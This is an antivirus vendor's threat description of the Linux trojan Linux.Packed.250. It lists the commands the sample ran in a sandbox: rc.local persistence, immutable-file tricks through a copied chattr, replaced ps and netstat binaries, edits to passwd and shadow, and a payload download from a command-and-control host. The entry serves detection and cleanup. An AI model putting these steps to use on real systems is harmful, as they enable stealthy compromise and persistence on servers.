Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Packed.250

Added to the Dr.Web virus database: 2018-12-25

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/rc.local
Malicious functions:
Removes itself
Gets access to SSH keys
  • /root/.ssh/authorlzed_keys
  • /root/.ssh/
Modifies firewall settings:
  • iptables -L INPUT
  • iptables -D INPUT -s -j DROP
Replaces the following system files:
  • /bin/ps
  • /bin/sedYc3yag
Manages services:
  • service network restart
  • systemctl restart network.service
Launches processes:
  • /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/sh <SAMPLE_FULL_PATH> -c
  • cp -f /usr/bin/chattr /usr/bin/lockr
  • cp -f /usr/bin/chattr /usr/bin/.locks
  • cp -f /usr/bin/.locks /usr/bin/lockr
  • chmod 777 /usr/bin/lockr
  • chmod 777 /usr/bin/.locks
  • lockr +i /usr/bin/lockr
  • lockr +i /usr/bin/.locks
  • lockr -i /usr/bin/dget
  • chmod 777 /usr/bin/dget
  • lockr +i /usr/bin/dget
  • lockr -i /usr/bin/pkill
  • chmod 777 /usr/bin/pkill
  • lockr +i /usr/bin/pkill
  • lockr -i /usr/bin/nohup
  • chmod 777 /usr/bin/nohup
  • lockr +i /usr/bin/nohup
  • lockr -i /usr/bin/killall
  • chmod 777 /usr/bin/killall
  • lockr +i /usr/bin/killall
  • lockr -i /usr/bin/nslookup
  • chmod 777 /usr/bin/nslookup
  • lockr +i /usr/bin/nslookup
  • lockr -i /usr/bin/
  • lockr -i /etc/init.d/
  • cat /etc/long.conf
  • awk {print $1}
  • date +%s%N
  • md5sum
  • head -c 10
  • awk {print $2}
  • nslookup linux.bc5j.com
  • grep Address:
  • lockr -i /etc/
  • lockr -i /etc/resolv.conf
  • lockr +i /etc/resolv.conf
  • sleep 1
  • mkdir /usr/bin/dpkgd/
  • cp -f /bin/ss /usr/bin/dpkgd/ss
  • cp -f /bin/ss /usr/bin/iss
  • chmod 777 /usr/bin/iss
  • chmod 777 /usr/bin/dpkgd/ss
  • lockr +i /usr/bin/dpkgd/ss
  • lockr +i /usr/bin/iss
  • cp -f /bin/netstat /usr/bin/dpkgd/netstat
  • cp -f /bin/netstat /usr/bin/nets
  • chmod 777 /usr/bin/nets
  • chmod 777 /usr/bin/dpkgd/netstat
  • lockr +i /usr/bin/dpkgd/netstat
  • lockr +i /usr/bin/nets
  • cp -f /bin/ps /usr/bin/dpkgd/ps
  • cp -f /bin/ps /usr/bin/ips
  • chmod 777 /usr/bin/ips
  • chmod 777 /usr/bin/dpkgd/ps
  • lockr +i /usr/bin/dpkgd/ps
  • lockr +i /usr/bin/ips
  • cp -f /etc/hosts.deny /etc/deny.bak
  • lockr +i /etc/deny.bak
  • cp -f /etc/hosts.allow /etc/allow.bak
  • lockr +i /etc/allow.bak
  • grep
  • grep ACCEPT
  • ips -ef
  • grep byquange
  • grep -v grep
  • wc -l
  • lockr -i /usr/bin/stone
  • rm -f /usr/bin/stone
  • dget http://:5788/stone
  • sh -c command -v curl >/dev/null 2>&1
  • sh -c command -v wget >/dev/null 2>&1
  • sh -c /bin/bash -c 'DGET_PATH=''
  • /bin/bash -c DGET_PATH=
  • mv -f /usr/bin/stone /usr/bin/f2d3e2f4b1
  • nets -anept
  • grep :2898
  • cut -d / -f 1
  • awk {print $9}
  • killall byquange
  • pkill byquange
  • lockr -i /usr/bin/byquange
  • rm -f /usr/bin/byquange
  • lockr -i /etc/long.conf
  • sed -i s|byquange|f2d3e2f4b1| /etc/long.conf
  • lockr +i /etc/long.conf
  • cat /bin/ps
  • lockr -i /bin/
  • lockr -i /bin/ps
  • chmod 777 /bin/ps
  • lockr +i /bin/ps
  • grep :2897
  • chmod 777 /usr/bin/f2d3e2f4b1
  • cp -f /usr/bin/f2d3e2f4b1 /usr/bin/longbak
  • nohup /usr/bin/f2d3e2f4b1
  • /usr/bin/f2d3e2f4b1
  • chmod 777 /usr/bin/longbak
  • lockr +i /usr/bin/longbak
  • cat /etc/rc.local
  • grep start
  • lockr -i /etc/rc.local
  • sed -i /start/d /etc/rc.local
  • grep /usr/bin/3529885178
  • grep exit 0
  • sed -i s|exit 0|/usr/bin/d6e152dfcd start| /etc/rc.local
  • cat /etc/passwd
  • grep quange
  • lockr -i /etc/passwd
  • lockr -a /etc/passwd
  • lockr +i /etc/passwd
  • cat /etc/shadow
  • lockr -i /etc/shadow
  • lockr -a /etc/shadow
  • lockr +i /etc/shadow
  • lockr -i /root/.ssh/
  • lockr -i /root/.ssh/authorlzed_keys
  • mkdir -p /root/.ssh
  • rm -f /root/.ssh/authorized_keys*
  • /etc/init.d/sshd restart
  • lockr +i /root/.ssh/authorlzed_keys
  • date +%F
  • netstat -ntlp
  • grep sshd
  • awk -F: {if($4!=\"\")print $4}
  • /sbin/ifconfig -a
  • grep inet
  • grep -v 127.0.0.1
  • grep -v inet6
  • tr -d addr:
  • nslookup ftp.bc5j.com
  • chmod 0755 /etc/up-date
  • killall .sshd
  • nohup /etc/up-date
  • /etc/up-date
  • ftp -n
  • pkill .sshd
  • cat /dev/null
  • rm -rf /etc/up-date
  • lockr -i /usr/bin/.sshd
  • rm -f /usr/bin/.sshd
  • lockr -i /usr/bin/wget
  • rm -f /usr/bin/wget
  • lockr -i /usr/bin/chattr
  • rm -f /usr/bin/chattr
  • lockr -i /etc/hosts.deny
  • cp -f /etc/deny.bak /etc/hosts.deny
  • lockr +i /etc/hosts.deny
  • lockr -i /etc/hosts.allow
  • cp -f /etc/allow.bak /etc/hosts.allow
  • lockr +i /etc/hosts.allow
  • sed -i s|3529885178|d6e152dfcd| /etc/long.conf
  • cp -f <SAMPLE_FULL_PATH> /usr/bin/d6e152dfcd
  • chmod 777 /usr/bin/d6e152dfcd
  • nohup /usr/bin/d6e152dfcd
  • /usr/bin/d6e152dfcd
  • /bin/sh /usr/bin/d6e152dfcd -c exec '/usr/bin/d6e152dfcd' \"$@\" /usr/bin/d6e152dfcd
  • sed -i s|3529885178|d6e152dfcd| /bin/ps
  • /bin/sh /usr/bin/d6e152dfcd -c
  • .locks -i /usr/bin/lockr
  • sed -i s|/usr/bin/3529885178 start|/usr/bin/d6e152dfcd start| /etc/rc.local
  • lockr -i <SAMPLE_FULL_PATH>
  • rm -f <SAMPLE_FULL_PATH>
Performs operations with the file system:
Modifies file access rights:
  • /usr/bin/lockr
  • /usr/bin/.locks
  • /usr/bin/dget
  • /usr/bin/pgrep
  • /usr/bin/nohup
  • /usr/bin/killall
  • /usr/bin/nslookup
  • /usr/bin/iss
  • /usr/bin/dpkgd/ss
  • /usr/bin/nets
  • /usr/bin/dpkgd/netstat
  • /usr/bin/ips
  • /usr/bin/dpkgd/ps
  • /etc/sedySpd6n
  • /bin/ps
  • /etc/sed1pwHLJ
  • /etc/sedolbihn
  • /etc/up-date
  • /etc/sed7M9cgd
  • /usr/bin/d6e152dfcd
  • /bin/sedYc3yag
  • /etc/sedbON6uL
Creates folders:
  • /usr/bin/dpkgd
  • /root/.ssh
Creates or modifies files:
  • /usr/bin/lockr
  • /usr/bin/.locks
  • /etc/long.conf
  • /etc/resolv.conf
  • /usr/bin/dpkgd/ss
  • /usr/bin/iss
  • /usr/bin/dpkgd/netstat
  • /usr/bin/nets
  • /usr/bin/dpkgd/ps
  • /usr/bin/ips
  • /etc/deny.bak
  • /etc/allow.bak
  • /etc/sedySpd6n
  • /etc/sed1pwHLJ
  • /etc/sedolbihn
  • /etc/passwd
  • /etc/shadow
  • /etc/ssh/sshd_config
  • /etc/192.168.218.50
  • /etc/up-date
  • /etc/hosts.deny
  • /etc/hosts.allow
  • /etc/sed7M9cgd
  • /usr/bin/d6e152dfcd
  • /bin/sedYc3yag
  • /etc/sedbON6uL
Deletes files:
  • /usr/bin/stone
  • /usr/bin/byquange
  • /root/.ssh/authorized_keys*
  • /etc/up-date
  • /usr/bin/.sshd
  • /usr/bin/wget
  • /usr/bin/chattr
Network activity:
DNS ASK:
  • li###.bc5j.com
  • ft#.#c5j.com
Other:
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number